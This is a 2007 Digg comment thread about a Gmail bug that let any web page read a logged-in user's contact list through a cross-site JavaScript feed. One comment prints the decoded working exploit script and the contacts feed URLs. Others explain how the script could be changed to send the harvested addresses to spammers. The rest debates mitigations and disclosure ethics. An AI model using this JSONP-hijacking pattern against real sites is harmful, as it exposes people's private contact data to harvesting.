154 Comments
- 47knight, on 10/12/2007, -5/+91: Same, over 600 of my contacts were exposed, and most of these are users from my site.
I'm digging this in hopes that Google will fix this.
- inactive, on 10/12/2007, -7/+51: @47knight
The original site says Google has been notified, but this should give some motivation.
I should also note this is a dupe of the original story which can be found here:
http://digg.com/security/Gmail_Bug_Your_Gmail_Contact_List_is_Being_Expose_to_Spammers
I duped it because I feel it's very irresponsible to link to the actual malicious source. Giving users the choice is more appropriate when exposing potentially thousands of people to it with no warning. Sure, he says he's not saving the emails, and he most likely isn't, but it's definitely not worth the risk.
- synystar, on 10/12/2007, -1/+41: Thank goodness. I was beginning to think that no one cared about my contacts.
- kubix, on 10/12/2007, -5/+38: WOW, this is pretty cool, it showed me all of my contacts when I was logged in. This sucks because I am always logged in.
- inactive, on 10/12/2007, -1/+24: NoScript appears to stop this from working.
- ShitHappens, on 10/12/2007, -1/+23: I think your contacts might care.
- haochi, on 10/12/2007, -1/+22: Hi, I am the one that found the bug.
First of all, I am sorry if it causes any inconvenience, or if it makes you feel insecure about Gmail. *I apologize*.
My intention in submitting this to Digg was only to get Google's attention to fix the bug, since I had been contacting them for hours and they had failed to do so (and the bug hasn't yet been fixed). I would never have thought anyone would paste the clear code out; although it's encoded a little, I know that it's easy to decode, as Firefox comes with a cool feature.
Once again, sorry to anyone for any inconvenience, and sorry for this new year's gift to Google.
- Bartboy919, on 10/12/2007, -4/+22: Hopefully this is fixed quickly, I know many people who rely on Gmail rather than traditional POP mail.
- toppgun, on 10/12/2007, -0/+16: it said my email was xxxxxxx@xxxxxx.com even though it really is yyyyyy@gmail.com
It's good to an extent; it got most of my contact list but it missed a few and it incorrectly identified me.
- jonmon6691, on 10/12/2007, -4/+19: WOW, some great news to start '07
- dainBramage, on 10/12/2007, -1/+15: Hmmm, maybe Gmail really is still in BETA!
- norbiu, on 10/12/2007, -7/+19: You are acting weird.
- mentholmoose, on 10/12/2007, -1/+13: Shouldn't be too much of a problem for me, because I have no friends, and therefore, no contacts. Woohoo.
- kd5ftn, on 10/12/2007, -1/+13: Yikes! I'll stick to using my Gmail via POP3!
- kalleanka, on 10/12/2007, -4/+14: "For security reasons the code use in this example has been, err, encoded."
And here is the script decoded. :)
<script>
// Google pwned
// Callback that the contacts feed invokes, passing the contact list as its argument.
function google(a){
  var emails, i;
  emails = "<ol>";
  emails += "<li>"+a.Body.Contacts[0].Email+" <font color='red'><--- Your email</font></li>";
  for(i=1;i<a.Body.Contacts.length;i++){
    emails += "<li>"+a.Body.Contacts[i].Email+"</li>";
  }
  emails += "</ol>";
  document.write(emails);
}
</script>
<!-- Loading the feed as a script makes the browser run google(...) with the logged-in user's contacts. -->
<script src="http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999"></script>
- adolfojp, on 10/12/2007, -1/+10: I wonder if diggers' response would have been as mild as this had this happened to MS Hotmail.
- tommajor, on 10/12/2007, -4/+12: so disable JavaScript except on trusted sites.
- M4v3R, on 10/12/2007, -0/+7: This is JavaScript code, but it could easily save your data by sending it via AJAX or an iframe form to a PHP script. I've checked the code and it doesn't, so you can sleep calmly.
- nikolai, on 10/12/2007, -0/+7: http://www.google.com/notebook/contacts?out=js&callback=asdf does the same thing so I'll block that one too for the time being
- kalleanka, on 10/12/2007, -0/+6: @kubix:
This is NOT fixed. It still works.
- headzoo, on 10/12/2007, -0/+6: That's kind of a problem though. Google (not so wisely) chose to use a global login. So for those of us using other Google features, like the personalized home page, logging out of Gmail also means logging out of those services. That's probably half the reason why most people just stay logged in.
I imagine email harvesters will have a field day with this.
- sishgupta, on 10/12/2007, -0/+6: It got "my email" wrong but the rest worked. A workaround (till it's fixed) is to always log out of Gmail before using any other sites.
- konig12, on 10/12/2007, -1/+7: Does it matter? Any client script could send the information to a server.
- M4v3R, on 10/12/2007, -0/+5: It should work in *every* browser that supports and has JavaScript turned on.
- centic, on 10/12/2007, -2/+7: well.. that's upsetting
- MrSunshine, on 10/12/2007, -0/+5: People in hospitals, public transportation, security...
- zcreem, on 10/12/2007, -0/+5: It is not fixed; this exploit is still open and needs closing.
The topic and post are both accurate and valid, not to mention of a lot more value than most here.
- gklitt, on 10/12/2007, -2/+7: Ah, Steve Gibson's "don't use scripting" advice comes in handy again.
- Progranism, on 10/12/2007, -3/+8: Here's how it works:
The Gmail page mentioned:
http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999
is a JavaScript file that calls the function "google" with an array of all your contacts. What this hack does is declare the function "google" and then include that JS file. Simple as that.
- kuza55, on 10/12/2007, -1/+5: @Freddy36
What about URLs which look like http://docs.google.com/data/contacts?max=99999&out=js&show=ALL&psort=Affinity&callback=google
That won't do it; you need to block http://docs.google.com/data/contacts?* but then a bunch of Google stuff might stop working.
Also, did you guys know Google also provides it in XML form? http://docs.google.com/data/contacts?out=xml Aren't they nice, :p Don't worry, the XML output isn't exploitable (unless you can somehow get a non-restrictive crossdomain.xml type file up there somewhere....), :p
- neuros, on 10/12/2007, -1/+5: @toppgun
It incorrectly identified me, too. Thought I was my own mother. That... would be a little too weird for me.
- JamesWilson, on 10/12/2007, -0/+4: It'd be easy for them to fix this, just check for the Referer, make sure it is Gmail.
- gabeN, on 10/12/2007, -0/+4: It's a y2k7 bug...
- jonmon6691, on 10/12/2007, -1/+5: Are we sure this isn't just client side script, or does the server have access to the addresses?
- m3mn0n, on 10/12/2007, -4/+8:
1. Everyone should get the NoScript extension for Firefox. Disable JavaScript globally and then only allow select sites the ability to run JS in your browser. That will fix this security hole and many others.
2. This is Ajax security gone bad. I wouldn't be surprised if many other web 2.0 sites that pass sensitive data via Ajax had this sort of security issue.
3. To the idiots that are posting code on how to exploit this.... STFU! This is an unpatched security hole and spreading around code only makes this issue worse.
4. The fact that this article links to the exploitable data is bad enough. We didn't need to see that; that only helps people wanting to steal data know what file to use. All the public needed to know was that a security hole exists and Google has been notified. FFS... whoever blogged this seriously needs to take some lessons from the big companies who find/report on Windows security holes.
Do you see those guys posting code and linking to resources to help hackers?
- gravis86, on 10/12/2007, -0/+4: ...And yet another reason to use NoScript...
- zcreem, on 10/12/2007, -0/+4: Not true, I cleared my cache and it still leaks.
- AngryBoy, on 10/12/2007, -0/+4: I suspect you're going to get buried for asking this, but an honest question deserves an honest answer.
Take a look at the non-obfuscated posted exploit above. See the line that says "document.write(emails);"? All this code is doing is printing your contact list to the current window. Like you said, no big deal, right? Well, by just changing this one line, someone could post all of your contacts to a list instead. You wouldn't even know they did it. Then after collecting contact lists from several Gmail users, they could sell that list for a pretty penny to some spammers. Think about it... almost everyone on your contact list is a real person you talk to, not just junk addresses. These kinds of email lists get top dollar from spammers.
- inactive, on 10/12/2007, -2/+5: Actually this is my blog and I posted directly in the Digg comments where I found it, and why I duped the post. The source was the malicious content! There is no reason to send Digg users to something potentially dangerous with no warning...
- MrSunshine, on 10/12/2007, -0/+3: "December 31st, 2006"
It's 1.1. here and I can still access the JavaScript.
- frunkie, on 10/12/2007, -0/+3: It didn't work for me...I believe it's fixed now
http://www.engadget.com/2007/01/01/gmail-bug-exposes-your-mail-account-to-spammers/
- haochi, on 10/12/2007, -0/+3: Well, if you use other Google services that require login, it will do the same trick. :)
- bertboerland, on 10/12/2007, -0/+3: wowsers, the "retrospective predictions of 2007" by http://www.heise-security.co.uk/articles/83058 is already done with this part
they wrote a document in 2006 as if it was 2007 and did the security highlights of that "past" year. Guess what:
"the private mails of thousands of GMail users could be accessed via the search front-end for at least one hour."
Well, not exactly right, but to see that this year started with compromising all contacts is bad enough.
BTW: whatever happened to giving a vendor two weeks to fix it before going public with an exploit? I mean 1/2 an hour! that's absurd, even for the best security team in the world. I think the guy was just "hits horny" and not driven by making the web more secure.
- JamesWilson, on 10/12/2007, -0/+3: Another option is to encrypt all the data based on a key that is known by the Gmail session and decrypt it client-side.
Another possible fix is to not hand out the contact list without a unique token passed in the querystring.
- markthegoth, on 10/12/2007, -1/+4: what about safari?
- jeriqo, on 10/12/2007, -0/+3: It works in any browser designed after 1990.
- kuza55, on 10/12/2007, -2/+4: This whole comment is directed at m3mn0n's post:
@point 3:
Oh noes, people are giving out information, it must be suppressed, or at least that's what you seem to be saying. Can anyone else see something wrong with that, or is it just me? Seriously though, anyone who can modify this code to steal your email addresses could deobfuscate it. All that providing the code and explanation of how it worked did was give those who can't a greater understanding of what NOT to do when writing code.
Sure, it could have been posted afterwards, but almost no-one wants to read about something which has been patched. And frankly I'm sure that's what most people who post content are interested in - readership.
And please don't call people idiots when they clearly aren't. They might not share your moral convictions about disclosing information, but that certainly doesn't make them idiots.
@point 4:
Ok, you didn't need to see it, but I certainly did. And saying that you should do what the "big companies" do is just silly; "big companies" have completely different goals - they have a product or service to sell, and their job is to convince you that they can perform a service better than anyone else, that their products are the best, that they have the best people working on your problems, etc. Whereas bloggers want to post things which interest, and frankly posting details is much more interesting than posting that there is a flaw.
@ "All the public needed to know ..."
Frankly, I think that your desire to suppress information is worrying, but I'm completely sure that there's no way of changing your views on that, so I'm not going to bother trying.